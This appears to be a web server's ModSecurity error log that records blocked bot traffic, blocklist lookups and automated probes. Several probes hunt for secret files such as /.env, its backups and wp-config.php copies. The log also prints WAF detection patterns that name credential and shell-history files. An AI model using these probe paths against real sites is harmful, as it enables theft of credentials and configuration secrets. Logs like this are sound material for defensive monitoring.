[Tue May 26 17:43:45.878204 2026] [security2:error] [pid 924957:tid 924977] [remote 216.73.216.30:13821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOeeYv2AvxeXULfJdWYgAAfxM"]
[Tue May 26 17:43:47.575169 2026] [security2:error] [pid 924957:tid 925105] [client 47.128.40.35:46352] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mail.ameritradeng.com"] [uri "/login/"] [unique_id "ahWOe-Yv2AvxeXULfJdWjAAAABI"]
[Tue May 26 17:43:47.822988 2026] [security2:error] [pid 924957:tid 925145] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOe-Yv2AvxeXULfJdWiAAAADo"]
[Tue May 26 17:43:50.009654 2026] [security2:error] [pid 924957:tid 925149] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOfeYv2AvxeXULfJdWxwAAAD4"]
[Tue May 26 17:43:50.919260 2026] [security2:error] [pid 924957:tid 924991] [remote 47.128.42.166:41476] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.christinaspromotions.com"] [uri "/"] [unique_id "ahWOfuYv2AvxeXULfJdW6wAARCE"]
[Tue May 26 17:43:51.936587 2026] [security2:error] [pid 924957:tid 924996] [remote 216.73.216.30:1025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOf-Yv2AvxeXULfJdXDQAAAyY"]
[Tue May 26 17:43:52.112165 2026] [security2:error] [pid 924957:tid 925136] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOf-Yv2AvxeXULfJdXAwAAADE"]
[Tue May 26 17:43:54.649763 2026] [security2:error] [pid 924957:tid 925128] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOguYv2AvxeXULfJdXVwAAACk"]
[Tue May 26 17:43:56.878756 2026] [security2:error] [pid 924957:tid 925092] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOhOYv2AvxeXULfJdXnQAAAAU"]
[Tue May 26 17:43:57.455113 2026] [security2:error] [pid 924957:tid 925079] [remote 54.36.102.244:36986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOheYv2AvxeXULfJdXtgAAeXk"]
[Tue May 26 17:43:58.693958 2026] [security2:error] [pid 924957:tid 925129] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOhuYv2AvxeXULfJdX2AAAACo"]
[Tue May 26 17:43:59.835099 2026] [security2:error] [pid 924957:tid 925158] [client 103.97.177.104:54679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.177.97.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/z7v.php"] [unique_id "ahWOh-Yv2AvxeXULfJdYAAAAAEc"]
[Tue May 26 17:43:59.863340 2026] [security2:error] [pid 924957:tid 925109] [client 142.132.180.39:1954] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWOh-Yv2AvxeXULfJdX9gAAABY"], referer: https://thegoodsporting.com
[Tue May 26 17:44:01.079834 2026] [security2:error] [pid 924957:tid 925176] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOiOYv2AvxeXULfJdYFQAAAFk"]
[Tue May 26 17:44:01.651033 2026] [security2:error] [pid 924957:tid 925045] [remote 160.250.186.220:48826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWOieYv2AvxeXULfJdYKQAAV1c"]
[Tue May 26 17:44:01.774913 2026] [security2:error] [pid 924957:tid 925043] [remote 216.73.216.30:1025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOieYv2AvxeXULfJdYMgAAFVU"]
[Tue May 26 17:44:03.110785 2026] [security2:error] [pid 924957:tid 925049] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env"] [unique_id "ahWOi-Yv2AvxeXULfJdYUwAAGVs"]
[Tue May 26 17:44:04.963119 2026] [security2:error] [pid 924957:tid 925199] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOjOYv2AvxeXULfJdYhAAAAHA"]
[Tue May 26 17:44:06.446338 2026] [security2:error] [pid 924957:tid 925095] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOjuYv2AvxeXULfJdYrQAAAAg"]
[Tue May 26 17:44:07.070808 2026] [security2:error] [pid 924957:tid 925035] [remote 216.73.216.30:54771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOj-Yv2AvxeXULfJdYzwAAPU0"]
[Tue May 26 17:44:07.853064 2026] [core:error] [pid 924957:tid 925155] [client 195.96.139.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:44:07.853085 2026] [core:error] [pid 924957:tid 925155] [client 195.96.139.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:44:08.950643 2026] [security2:error] [pid 924957:tid 925199] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOkOYv2AvxeXULfJdY_QAAAHA"]
[Tue May 26 17:44:10.488026 2026] [security2:error] [pid 924957:tid 925184] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOkuYv2AvxeXULfJdZLgAAAGE"]
[Tue May 26 17:44:10.792073 2026] [security2:error] [pid 924957:tid 925121] [client 123.23.165.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOkuYv2AvxeXULfJdZNwAAACI"]
[Tue May 26 17:44:11.708402 2026] [security2:error] [pid 924957:tid 925064] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.backup"] [unique_id "ahWOk-Yv2AvxeXULfJdZYgAAemo"]
[Tue May 26 17:44:11.848527 2026] [fcgid:warn] [pid 924957:tid 925214] (70014)End of file found: [client 199.45.154.152:35556] mod_fcgid: can't get data from http client
[Tue May 26 17:44:11.968721 2026] [security2:error] [pid 924957:tid 925069] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.old"] [unique_id "ahWOk-Yv2AvxeXULfJdZcwAARW8"]
[Tue May 26 17:44:12.390489 2026] [security2:error] [pid 924957:tid 924963] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.bak"] [unique_id "ahWOlOYv2AvxeXULfJdZfwAAAAU"]
[Tue May 26 17:44:12.615462 2026] [security2:error] [pid 924957:tid 925073] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/.env"] [unique_id "ahWOlOYv2AvxeXULfJdZhgAACXM"]
[Tue May 26 17:44:12.855085 2026] [security2:error] [pid 924957:tid 924965] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/app/.env"] [unique_id "ahWOlOYv2AvxeXULfJdZjgAAIwc"]
[Tue May 26 17:44:13.120262 2026] [security2:error] [pid 924957:tid 925070] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/src/.env"] [unique_id "ahWOleYv2AvxeXULfJdZmwAASXA"]
[Tue May 26 17:44:13.413438 2026] [security2:error] [pid 924957:tid 925166] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOlOYv2AvxeXULfJdZlQAAAE8"]
[Tue May 26 17:44:13.587499 2026] [security2:error] [pid 924957:tid 925072] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backend/.env"] [unique_id "ahWOleYv2AvxeXULfJdZpwAAbXI"]
[Tue May 26 17:44:14.214460 2026] [security2:error] [pid 924957:tid 925075] [remote 123.30.233.13:49400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOluYv2AvxeXULfJdZsgAATXU"]
[Tue May 26 17:44:14.516112 2026] [security2:error] [pid 924957:tid 924966] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/api/.env"] [unique_id "ahWOluYv2AvxeXULfJdZyAAAVgg"]
[Tue May 26 17:44:15.021010 2026] [security2:error] [pid 924957:tid 925078] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config.php"] [unique_id "ahWOluYv2AvxeXULfJdZ1QAAeng"]
[Tue May 26 17:44:15.570356 2026] [security2:error] [pid 924957:tid 925166] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOl-Yv2AvxeXULfJdZ2wAAAE8"]
[Tue May 26 17:44:15.581174 2026] [security2:error] [pid 924957:tid 924976] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/settings.php"] [unique_id "ahWOl-Yv2AvxeXULfJdZ6QAABBI"]
[Tue May 26 17:44:17.199367 2026] [security2:error] [pid 924957:tid 924977] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php"] [unique_id "ahWOmeYv2AvxeXULfJdaFwAAfxM"]
[Tue May 26 17:44:17.456924 2026] [security2:error] [pid 924957:tid 924979] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config.php.bak"] [unique_id "ahWOmeYv2AvxeXULfJdaIgAAbxU"]
[Tue May 26 17:44:17.850881 2026] [security2:error] [pid 924957:tid 924984] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.backup"] [unique_id "ahWOmeYv2AvxeXULfJdaMgAAUBo"]
[Tue May 26 17:44:18.113059 2026] [security2:error] [pid 924957:tid 925171] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOmeYv2AvxeXULfJdaJQAAAFQ"]
[Tue May 26 17:44:18.202390 2026] [security2:error] [pid 924957:tid 924985] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.bak"] [unique_id "ahWOmuYv2AvxeXULfJdaOAAAXRs"]
[Tue May 26 17:44:18.477839 2026] [security2:error] [pid 924957:tid 924989] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.old"] [unique_id "ahWOmuYv2AvxeXULfJdaRAAALR8"]
[Tue May 26 17:44:18.797170 2026] [security2:error] [pid 924957:tid 924990] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.save"] [unique_id "ahWOmuYv2AvxeXULfJdaTAAAJiA"]
[Tue May 26 17:44:19.030256 2026] [security2:error] [pid 924957:tid 924998] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.swp"] [unique_id "ahWOm-Yv2AvxeXULfJdaWAAAHCg"]
[Tue May 26 17:44:19.291383 2026] [security2:error] [pid 924957:tid 924995] [remote 45.148.10.5:50784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-config.php.txt"] [unique_id "ahWOm-Yv2AvxeXULfJdaXQAAeyU"]
[Tue May 26 17:44:20.543098 2026] [security2:error] [pid 924957:tid 925182] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOnOYv2AvxeXULfJdaewAAAF8"]
[Tue May 26 17:44:22.105255 2026] [security2:error] [pid 924957:tid 925194] [client 184.154.36.177:57578] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.mpdpl.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOnuYv2AvxeXULfJdaxAAAAGs"]
[Tue May 26 17:44:22.574219 2026] [security2:error] [pid 924957:tid 925170] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOnuYv2AvxeXULfJdayAAAAFM"]
[Tue May 26 17:44:22.965728 2026] [security2:error] [pid 924957:tid 925109] [client 40.77.167.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWOnuYv2AvxeXULfJda0AAAABY"]
[Tue May 26 17:44:23.679109 2026] [security2:error] [pid 924957:tid 925124] [client 160.119.76.58:32810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/xmlrpc.php"] [unique_id "ahWOn-Yv2AvxeXULfJda9QAAACU"]
[Tue May 26 17:44:24.276004 2026] [security2:error] [pid 924957:tid 925143] [client 207.241.173.169:33236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahWOoOYv2AvxeXULfJdbHgAAADg"]
[Tue May 26 17:44:24.276086 2026] [security2:error] [pid 924957:tid 925141] [client 207.241.173.169:33228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahWOoOYv2AvxeXULfJdbHwAAADY"]
[Tue May 26 17:44:24.276109 2026] [security2:error] [pid 924957:tid 925116] [client 207.241.173.169:33190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahWOoOYv2AvxeXULfJdbIgAAAB0"]
[Tue May 26 17:44:24.277564 2026] [security2:error] [pid 924957:tid 925137] [client 207.241.173.169:33220] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.karuppuswamykovil.in"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahWOoOYv2AvxeXULfJdbJwAAADI"]
